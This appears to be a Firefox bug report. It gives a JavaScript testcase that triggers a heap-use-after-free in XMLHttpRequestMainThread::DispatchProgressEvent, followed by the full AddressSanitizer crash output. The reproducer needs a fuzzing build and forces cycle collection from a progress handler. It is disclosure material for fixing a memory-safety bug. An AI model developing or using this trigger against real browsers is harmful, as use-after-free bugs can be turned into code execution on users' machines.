

The following testcase crashes the latest ASAN build of Firefox 68.0a1 (SourceStamp=93075ec49df3982c26873b822d762bd3d8863fad). It requires a fuzzing build (--enable-fuzzing) and the pref `user_pref("fuzzing.enabled",true)`. I am using a Python2 webserver (`python -m SimpleHTTPServer`) to host the testcase.

crash.html:
```
<script>
// Issue one synchronous cross-origin POST and swallow whatever send()
// throws. fun1() calls this ten times in a row between re-sending the
// request and forcing GC/CC; only the side effect of the sync request
// matters to the reproducer, never its result.
function spin() {
    var req = new XMLHttpRequest();
    req.open("POST", "https://mozilla.org/", false);
    try {
        req.send("X");
    } catch (err) {
        // Deliberately ignored: a failed sync request is expected here.
    }
}
// onload entry point (see <body onload="start()"> at the bottom of the
// page). Builds the two XMLHttpRequest objects the reproducer juggles
// and wires their handlers. All four names are implicit globals that
// fun0() and fun1() read, and fun1() later nulls them before forcing
// GC/CC. The allocated-by stack in the ASAN report (XMLHttpRequest::
// Constructor under the onload dispatch) points at one of the two
// constructors below; the report does not say which.
function start() {
	// Document element, later passed as the send() body in fun0().
	o305=document.documentElement;
	o339=new XMLHttpRequest();
    o1155=new XMLHttpRequest();
	// Async GET with an oversized URL; fun0 runs on every readystatechange.
	o339.open('GET','/a'+ "a".repeat(204811),true);
	o339.onreadystatechange=fun0;
	o339.send(undefined);
	// Upload object of the second request; its progress events run fun1().
	o1537=o1155.upload;
	o1537.onprogress=fun1;
}
// readystatechange handler for o339. Re-opens the second request
// (o1155) as an async POST with an oversized URL and sends the document
// element (o305) as the body. Both names are implicit globals assigned
// in start().
function fun0() {
    var target = '/x' + "a".repeat(204811);
    o1155.open('POST', target, true);
    o1155.send(o305);
}
// upload progress handler for o1155. Per the ASAN report below, a JS
// event handler calling FuzzingFunctions cycleCollect() (freed-by
// frames #7..#33) is what frees the XMLHttpRequest: the handler is
// dispatched from XMLHttpRequestMainThread::DispatchProgressEvent at
// XMLHttpRequestMainThread.cpp:1224, and the write at line 1227 of
// (presumably) the same DispatchProgressEvent invocation then touches
// the freed object. This is the only function on the page that calls
// cycleCollect(), so the handler in question is fun1(). The reproducer
// depends on this exact statement order; do not reorder.
function fun1() {
    window.dump(1);
	// Re-open the same request as an async GET while its upload is mid-progress.
	o1155.open('GET','/a'+'a'.repeat(101111),true);
	o1155.send(undefined);
	// Ten synchronous cross-origin requests; any exception is swallowed in spin().
    for(var x=0;x<10;x++) spin();
	// Drop every JS reference so the XHR objects become collectable...
    o1155 = null;
    o1537 = null;
    o339 = null;
    o305 = null;
	// ...then force GC/CC. The freed-by stack shows cycleCollect ->
	// nsCycleCollector::FreeSnowWhite -> SnowWhiteKiller -> free.
    FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();
}
</script>
<body onload="start()"></body>
```
ASAN output:
=================================================================
==20801==ERROR: AddressSanitizer: heap-use-after-free on address 0x6170000c26c3 at pc 0x7f8f0918abbb bp 0x7ffe0541f310 sp 0x7ffe0541f308
WRITE of size 1 at 0x6170000c26c3 thread T0 (Web Content)
    #0 0x7f8f0918abba in mozilla::dom::XMLHttpRequestMainThread::DispatchProgressEvent(mozilla::DOMEventTargetHelper*, mozilla::dom::XMLHttpRequestMainThread::ProgressEventType, long, long) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:1227:26
    #1 0x7f8f091b3430 in mozilla::dom::XMLHttpRequestMainThread::HandleProgressTimerCallback() /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp
    #2 0x7f8f091b2e60 in mozilla::dom::XMLHttpRequestMainThread::Notify(nsITimer*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3400:5
    #3 0x7f8efee5dc51 in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:562:40
    #4 0x7f8efee5cfba in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:260:11
    #5 0x7f8efee35a15 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #6 0x7f8efee75a56 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
    #7 0x7f8efee7d71d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #8 0x7f8f001df7c4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:110:5
    #9 0x7f8f000b4a9e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #10 0x7f8f000b4a9e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #11 0x7f8f000b4a9e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #12 0x7f8f096a21b3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #13 0x7f8f0dc6798e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #14 0x7f8f000b4a9e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #15 0x7f8f000b4a9e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #16 0x7f8f000b4a9e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #17 0x7f8f0dc66b1c in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:757:34
    #18 0x5645a6183834 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #19 0x5645a6183834 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:263
    #20 0x7f8f22d88b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #21 0x5645a60a8ebc in _start (/home/nils/browser/firefox/firefox/firefox+0x2debc)

0x6170000c26c3 is located 579 bytes inside of 688-byte region [0x6170000c2480,0x6170000c2730)
freed by thread T0 (Web Content) here:
    #0 0x5645a61509e2 in free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7f8efec38751 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2416:7
    #2 0x7f8efec36e03 in nsCycleCollector::FreeSnowWhite(bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2607:3
    #3 0x7f8efec437e2 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3582:3
    #4 0x7f8efec42a75 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3411:9
    #5 0x7f8efec47b16 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3947:21
    #6 0x7f8f036c0b8a in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1413:3
    #7 0x7f8f0604ef69 in mozilla::dom::FuzzingFunctions_Binding::cycleCollect(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FuzzingFunctionsBinding.cpp:66:3
    #8 0x7f8f0df517c7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #9 0x7f8f0df517c7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534
    #10 0x7f8f0f118e1d in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:3858:10
    #11 0x1cf31cd64887  (<unknown module>)
    #12 0x6210006391ff  (<unknown module>)
    #13 0x1cf31cd624de  (<unknown module>)
    #14 0x7f8f0f30f641 in EnterBaseline /builds/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:111:5
    #15 0x7f8f0f30f641 in js::jit::EnterBaselineAtBranch(JSContext*, js::InterpreterFrame*, unsigned char*) /builds/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:189
    #16 0x7f8f0df41b4d in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:1982:24
    #17 0x7f8f0df1bbe8 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #18 0x7f8f0df52138 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:562:13
    #19 0x7f8f0df53d82 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:605:8
    #20 0x7f8f0eb99e99 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2621:10
    #21 0x7f8f05d44e10 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:266:37
    #22 0x7f8f07014df2 in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #23 0x7f8f07014df2 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #24 0x7f8f06fc4c4a in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1045:22
    #25 0x7f8f06fc7281 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1240:17
    #26 0x7f8f06fa73f0 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:355:5
    #27 0x7f8f06fa73f0 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #28 0x7f8f06fa5618 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #29 0x7f8f06fac383 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1046:11
    #30 0x7f8f06fb40a6 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp
    #31 0x7f8f06f5e770 in mozilla::DOMEventTargetHelper::DispatchEvent(mozilla::dom::Event&, mozilla::dom::CallerType, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/events/DOMEventTargetHelper.cpp:166:17
    #32 0x7f8f06fd9b8a in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&) /builds/worker/workspace/build/src/dom/events/EventTarget.cpp:178:13
    #33 0x7f8f0918a909 in mozilla::dom::XMLHttpRequestMainThread::DispatchProgressEvent(mozilla::DOMEventTargetHelper*, mozilla::dom::XMLHttpRequestMainThread::ProgressEventType, long, long) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:1224:3

previously allocated by thread T0 (Web Content) here:
    #0 0x5645a6150d63 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x5645a61855fd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:68:15
    #2 0x7f8f09179593 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:131:10
    #3 0x7f8f09179593 in mozilla::dom::XMLHttpRequest::Constructor(mozilla::dom::GlobalObject const&, mozilla::dom::MozXMLHttpRequestParameters const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequest.cpp:45
    #4 0x7f8f059d5cbc in mozilla::dom::XMLHttpRequest_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:2553:64
    #5 0x7f8f0df54a2f in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #6 0x7f8f0df54a2f in CallJSNativeConstructor /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:458
    #7 0x7f8f0df54a2f in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:651
    #8 0x7f8f0df399af in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3066:16
    #9 0x7f8f0df1bbe8 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #10 0x7f8f0df52138 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:562:13
    #11 0x7f8f0df53d82 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:605:8
    #12 0x7f8f0eb99e99 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2621:10
    #13 0x7f8f05d44e10 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:266:37
    #14 0x7f8f07014df2 in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #15 0x7f8f07014df2 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #16 0x7f8f06fc4c4a in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1045:22
    #17 0x7f8f06fc7223 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1240:17
    #18 0x7f8f06fa73f0 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:355:5
    #19 0x7f8f06fa73f0 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #20 0x7f8f06fa5618 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #21 0x7f8f06fac383 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1046:11
    #22 0x7f8f09f589ba in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1098:7
    #23 0x7f8f0cdc3d8c in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6596:21
    #24 0x7f8f0cdc2eb8 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6397:7
    #25 0x7f8f0cdc8a27 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #26 0x7f8f01a51c25 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1313:3
    #27 0x7f8f01a5080c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:872:14
    #28 0x7f8f01a4b957 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:710:9
    #29 0x7f8f01a4ea55 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:598:5
    #30 0x7f8f01a50334 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #31 0x7f8eff11e6b2 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:568:22
    #32 0x7f8f032f68ca in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/Document.cpp:7821:18
    #33 0x7f8f032f68ca in mozilla::dom::Document::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/Document.cpp:7753
    #34 0x7f8f032f532f in mozilla::dom::Document::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/Document.cpp:4873:3
    #35 0x7f8f033fa8db in applyImpl<mozilla::dom::Document, void (mozilla::dom::Document::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1122:12
    #36 0x7f8f033fa8db in apply<mozilla::dom::Document, void (mozilla::dom::Document::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1128
    #37 0x7f8f033fa8db in mozilla::detail::RunnableMethodImpl<mozilla::dom::Document*, void (mozilla::dom::Document::*)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1174

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:1227:26 in mozilla::dom::XMLHttpRequestMainThread::DispatchProgressEvent(mozilla::DOMEventTargetHelper*, mozilla::dom::XMLHttpRequestMainThread::ProgressEventType, long, long)
Shadow bytes around the buggy address:
  0x0c2e80010480: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e80010490: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e800104a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e800104b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e800104c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c2e800104d0: fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd
  0x0c2e800104e0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa
  0x0c2e800104f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e80010500: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80010510: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80010520: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==20801==ABORTING
